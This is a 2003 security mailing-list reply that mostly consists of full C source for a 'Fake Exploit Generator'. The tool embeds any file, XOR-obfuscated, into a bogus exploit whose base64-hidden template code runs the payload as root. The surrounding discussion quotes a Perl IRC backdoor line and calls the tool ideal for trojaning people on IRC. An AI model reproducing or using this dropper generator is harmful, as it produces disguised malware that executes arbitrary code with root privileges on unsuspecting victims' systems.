
Re: Re: -1 day exploit - Warning


From: gml <gml () phrick net>
Date: Fri, 13 Jun 2003 22:39:03 -0400

On Friday 13 June 2003 06:51 pm, David Bernick wrote:

Well anyway, I got inspired:

// Fake Exploit Generator
// gml () phrick net
//

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Non-zero when byte `c` is not in the base64 alphabet. Side effect: stores
 * the address of `c` within b64string in `p`, so (p - b64string) is the
 * 6-bit value of `c`. Both arguments are evaluated once. memchr() needs
 * <string.h>. */
#define badchar(c,p) (!(p = memchr(b64string, c, 64)))

/* Name of the program main() runs on the generated source once it has been
 * written; defining it also enables that code path (#ifdef BEAUTIFY). */
#define BEAUTIFY "indent"

/* Standard base64 alphabet; the index of a character is its 6-bit value.
 * Exactly 64 bytes are searched, so the terminating NUL never matches. */
char b64string[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* Base64 of the top of the generated file. Decoded it is a
 * "// generated with Fake Exploit Generator :: gml@phrick.net" comment
 * (an easy fingerprint for anyone inspecting the output) followed by
 * #include lines for stdio.h, sys/types.h, sys/stat.h and unistd.h.
 * The adjacent string literals are concatenated into one NUL-terminated
 * array, so sizeof(header) is one more than the base64 text length. */
static char header[] = {
"Ly8gZ2VuZXJhdGVkIHdpdGggRmFrZSBFeHBsb2l0IEdlbmVyYXRvciA6OiBnbWxAcGhyaWNr"
"Lm5ldAoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1"
"ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4K"
};

/* Base64 of the rest of the generated file, emitted after the
 * `#define MAX <key>` and the `shellcode[]` literal. Decoded it defines:
 *   usage(args, self) - exit(0) with a message unless getuid() == 0, then
 *                       exit(0) with "usage: %s <target>" unless args >= 2
 *   setup()           - fopen()s a tmpnam(NULL) path, writes
 *                       shellcode[i] ^ MAX for i < sizeof(shellcode),
 *                       chmod()s it 0755, runs it with system(), unlink()s it
 *   main()            - usage(argc, argv[0]); setup();
 * i.e. the "exploit" is a dropper that executes the embedded payload as
 * root. Two quirks of that template: it declares `char byte[0]` and writes
 * through it, and its loop bound sizeof(shellcode) includes the string
 * literal's NUL, so one extra byte (0 ^ MAX) is appended to the payload. */
static char body[] = {
"dm9pZCB1c2FnZShpbnQgYXJncywgY2hhciAqc2VsZikKewoJaWYoZ2V0dWlkKCkgIT0gMCkK"
"CXsKCQlwcmludGYoIlRoaXMgcHJvZ3JhbSByZXF1aXJlcyBwcml2aWxlZGdlcyB5b3UgZG8g"
"bm90IHBvc2Vzcy5cbiIpOwoJCWV4aXQoMCk7Cgl9CgllbHNlCgl7CgoJCWlmKGFyZ3MgPCAy"
"KQoJCXsKCQkJcHJpbnRmKCJ1c2FnZTogJXMgPHRhcmdldD5cbiIsIHNlbGYpOwoJCQlleGl0"
"KDApOwoJCX0KCX0KCn0KCnZvaWQgc2V0dXAoKQp7CgljaGFyICp0bXA7CglGSUxFICpmcDsK"
"CWNoYXIgYnl0ZVswXTsKCWludCBpOwoKCXRtcCA9IHRtcG5hbShOVUxMKTsKCWZwID0gZm9w"
"ZW4odG1wLCAidyIpOwoJaWYoZnApCgl7CgkJZm9yKGkgPSAwOyBpIDwgc2l6ZW9mKHNoZWxs"
"Y29kZSk7IGkrKykKCQl7CgkJCWJ5dGVbMF0gPSBzaGVsbGNvZGVbaV0gXiBNQVg7CgkJCWZ3"
"cml0ZShieXRlLCAxLCAxLCBmcCk7CgkJfQoJCWZjbG9zZShmcCk7CgkJY2htb2QodG1wLCAw"
"NzU1KTsKCQlzeXN0ZW0odG1wKTsKCQl1bmxpbmsodG1wKTsKCX0KfQoKaW50Cm1haW4gKGlu"
"dCBhcmdjLCBjaGFyICphcmd2W10pCnsKCXVzYWdlKGFyZ2MsIGFyZ3ZbMF0pOwoJc2V0dXAo"
"KTsKCS8vIGRvIHNvbWUgc2hpdCBoZXJlCn0K"
};

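/*
 * Decode base64 text into `to`.
 *
 * `from`  base64 text; the first `len` bytes are considered and consumed in
 *         4-character quads. Only complete quads are decoded: 1-3 trailing
 *         bytes are left unread and reported through the return value,
 *         AFTER the decoded quads and a NUL terminator have been written.
 *         (A caller that passes sizeof() of a string literal, which counts
 *         the NUL, therefore still gets the decoded text in `to`.)
 * `to`    must hold at least (len / 4) * 3 + 1 bytes.
 *
 * '=' is accepted only as trailing padding in the last two slots of a quad
 * and may not be followed by a data character within that quad; any byte
 * outside the alphabet is an error. Those inputs used to decode silently
 * as zero bits (or reset the padding count), producing garbage.
 *
 * Returns the number of decoded payload bytes (padding excluded), or -1 when
 * an invalid byte was seen or len is not a multiple of 4. On the invalid-byte
 * path the partial output is left WITHOUT a NUL terminator.
 */
long b64dec (char *to, const char *from, unsigned int len)
{
    static const char alphabet[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    char *top = to;
    int padding = 0;

    for (; len >= 4; len -= 4, from += 4) {
        unsigned char v[4];
        int i;

        padding = 0;
        for (i = 0; i < 4; i++) {
            const char *p;

            if (from[i] == '=' && i >= 2) {
                /* trailing padding: contributes zero bits */
                v[i] = 0;
                padding++;
                continue;
            }
            if (padding != 0)       /* data after '=' inside the quad */
                return -1;
            /* 64 bytes searched: the NUL never matches, '=' in slots 0-1
             * and bytes >= 0x80 (negative chars) fail here too */
            p = memchr(alphabet, from[i], 64);
            if (p == NULL)
                return -1;
            v[i] = (unsigned char)(p - alphabet);
        }

        /* 4 x 6 bits -> 3 x 8 bits; the casts discard the bits that
         * belong to the neighbouring output byte */
        *top++ = (char)((v[0] << 2) | (v[1] >> 4));
        *top++ = (char)((v[1] << 4) | (v[2] >> 2));
        *top++ = (char)((v[2] << 6) | v[3]);
    }

    *top = '\0';
    if (len != 0)
        return -1;
    return (long)(top - to) - padding;
}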

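/*
 * Write byte `c` to `fp` as a C string-literal escape, "\xNN", with exactly
 * two lower-case hex digits.
 *
 * `c` goes through unsigned char so that bytes >= 0x80 print as "\x80".."\xff"
 * whether or not `char` is signed on this platform. The previous version
 * printed the sign-extended int with "%x" and sliced digits 6 and 7 out of
 * the result, which only works when int is 32 bits wide.
 */
void printhex(char c, FILE *fp)
{
    fprintf(fp, "\\x%02x", (unsigned char)c);
}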

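/*
 * Entry point of the generator.
 *
 *   argv[1]  file whose bytes are embedded (opened in binary mode)
 *   argv[2]  C source file to write
 *   argv[3]  XOR key, a decimal integer in 0..255; it is written into the
 *            output as `#define MAX <key>` and every embedded byte is
 *            stored as byte ^ key
 *
 * Output layout: the decoded `header` blob, the MAX define, a
 * `static char shellcode[]` string literal holding 16 "\xNN" escapes per
 * line, then the decoded `body` blob. When BEAUTIFY is defined (above, as
 * "indent") that program is run on the finished file, with the path passed
 * as a single argv entry rather than through a shell.
 *
 * Returns 0 on success, 1 on a usage, key, decode or I/O error.
 */
int main(int argc, char *argv[])
{
    FILE *trojan;
    FILE *fakeexp;
    /* Scratch space for the decoded blobs. Decoded base64 is shorter than
     * its encoding and body is the larger of the two, so this fits both. */
    char out[sizeof(body)];
    char *end;
    long key;
    long nbytes = 0;    /* bytes read from argv[1] */
    int count = 0;      /* escapes emitted on the current output line */
    int c;
    int ok = 0;

    if (argc < 4) {
        fprintf(stderr, "usage: %s trojan fakeexp.c key\n", argv[0]);
        fprintf(stderr, "ex: %s trojan fakeexp.c 187\n", argv[0]);
        return 1;
    }

    /* The key is pasted into the generated source as a #define, so it is
     * parsed strictly here instead of echoing argv[3] verbatim. */
    errno = 0;
    key = strtol(argv[3], &end, 10);
    if (end == argv[3] || *end != '\0' || errno == ERANGE || key < 0 || key > 255) {
        fprintf(stderr, "%s: key must be a decimal integer in 0..255, got \"%s\"\n",
                argv[0], argv[3]);
        return 1;
    }

    trojan = fopen(argv[1], "rb");
    if (trojan == NULL) {
        perror(argv[1]);
        return 1;
    }
    fakeexp = fopen(argv[2], "w");
    if (fakeexp == NULL) {
        perror(argv[2]);
        fclose(trojan);
        return 1;
    }

    /* sizeof() - 1: hand the decoder the text length, not the array size,
     * so the literal's NUL is not seen as a stray fifth byte. */
    if (b64dec(out, header, sizeof(header) - 1) < 0) {
        fprintf(stderr, "%s: built-in header template is not valid base64\n", argv[0]);
        goto done;
    }
    fputs(out, fakeexp);
    fprintf(fakeexp, "\n#define MAX\t%ld\n\n", key);
    fputs("static char shellcode[] = {\n", fakeexp);

    /* Stop on the read that returns EOF; testing feof() before reading
     * would emit one bogus trailing byte (0 ^ key) past the real end. */
    while ((c = fgetc(trojan)) != EOF) {
        if (count == 0)
            fputc('"', fakeexp);
        printhex((char)((unsigned char)c ^ key), fakeexp);
        nbytes++;
        if (++count == 16) {
            fputs("\"\n", fakeexp);
            count = 0;
        }
    }
    if (ferror(trojan)) {
        perror(argv[1]);
        goto done;
    }
    if (nbytes == 0) {
        fprintf(stderr, "%s: %s is empty\n", argv[0], argv[1]);
        goto done;
    }
    /* Close a partial last line only; a line that was just completed must
     * not receive a second, unterminated opening quote. */
    if (count != 0)
        fputs("\"\n", fakeexp);
    fputs("};\n\n", fakeexp);

    if (b64dec(out, body, sizeof(body) - 1) < 0) {
        fprintf(stderr, "%s: built-in body template is not valid base64\n", argv[0]);
        goto done;
    }
    fputs(out, fakeexp);
    ok = (ferror(fakeexp) == 0);

done:
    /* fclose() flushes; a failure here means the file on disk is incomplete */
    if (fclose(fakeexp) != 0) {
        perror(argv[2]);
        ok = 0;
    }
    fclose(trojan);
    if (!ok)
        return 1;

#ifdef BEAUTIFY
    /* fork/exec instead of system(BEAUTIFY " " path): the path comes
     * straight from argv, and handing it to a shell would let any
     * metacharacters in it run commands; it also removes the need for a
     * correctly sized command buffer. */
    {
        pid_t pid = fork();

        if (pid < 0) {
            perror("fork");
        } else if (pid == 0) {
            execlp(BEAUTIFY, BEAUTIFY, argv[2], (char *)NULL);
            perror(BEAUTIFY);
            _exit(127);
        } else {
            int status;

            while (waitpid(pid, &status, 0) < 0 && errno == EINTR)
                ;
        }
    }
#endif
    return 0;
}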


Wow, I'd never run something that had a printf statement in it with

 print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake
 0day exp loit. v2\nPRIVMSG $chan :to run commands on me, type:
".$nick.": command\n";

If you run this you deserve to get owned. This guy could have at least XOR'd the strings and base64-encoded them or SOMETHING.

The printf statement is inside the shellcode bytes. If you don't know C and/or hex very well, it looks semi-legitimate. The attached Perl code is the decoded shellcode; it does not appear in plain text in the actual "exploit". This is the perfect kind of program for trojaning little hacker wannabes on IRC.

and no one deserves to be owned. They just need to pay for highly paid
security consultants instead (shhh..kidding).

d


